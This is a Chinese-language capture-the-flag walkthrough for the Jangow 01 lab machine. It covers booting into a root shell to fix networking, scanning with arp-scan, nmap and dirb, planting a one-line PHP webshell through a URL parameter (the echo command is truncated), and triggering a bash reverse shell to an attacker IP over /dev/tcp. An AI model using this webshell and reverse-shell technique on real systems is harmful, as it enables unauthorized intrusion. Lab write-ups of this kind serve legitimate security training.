> 技术文档 > jangow-01-1.0.1靶机攻略

jangow-01-1.0.1靶机攻略


一.环境准备

1.1jangow靶机环境准备

1.1.1首先将我们解压好的的jangow-01-1.0.1.ova放入虚拟机里,并配置环境,安装好靶机后打开进行配置,按住shift,在界面按e进去得到图二。

1.1.2将ro 替换为 rw signie init=/bin/bash

1.1.3按住ctrl+x,ip a查看网卡信息,修改配置文件网卡信息

1.1.4编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠,修改为如图所示内容后按shift+?然后输入wq点击回车退出,重启靶场

二.信息搜集

2.1ip搜集

2.1.1arp-scan -l  扫描靶机ip,发现靶机ip为192.168.182.138

2.2端口扫描

2.2.1使用nmap工具对目标机进行端口扫描,发现开启了80,21端口

2.2.2访问80,看有无有用信息,点击site

2.2.3依次点击,About,Projects,点击Buscar时,发现Buscar页面的url可以传参

2.3目录扫描

2.3.1使用kali的dirb进行目录扫描

三.漏洞利用

3.1输入一句话木马到1.php文件中,查看我们的1.php是否生效,访问http://192.168.182.138/site/1.php,发现生效

echo \' 1.php

3.2复制绝对路径,去蚁剑连接

3,3在kali开启监听并触发反弹shell

在虚拟终端中输入

/bin/bash -c \'bash -i >& /dev/tcp/192.168.182.130/443 0>&1\'

触发成功

jangow靶机练习到此结束

                                                                                                                               2025.7.27 17:20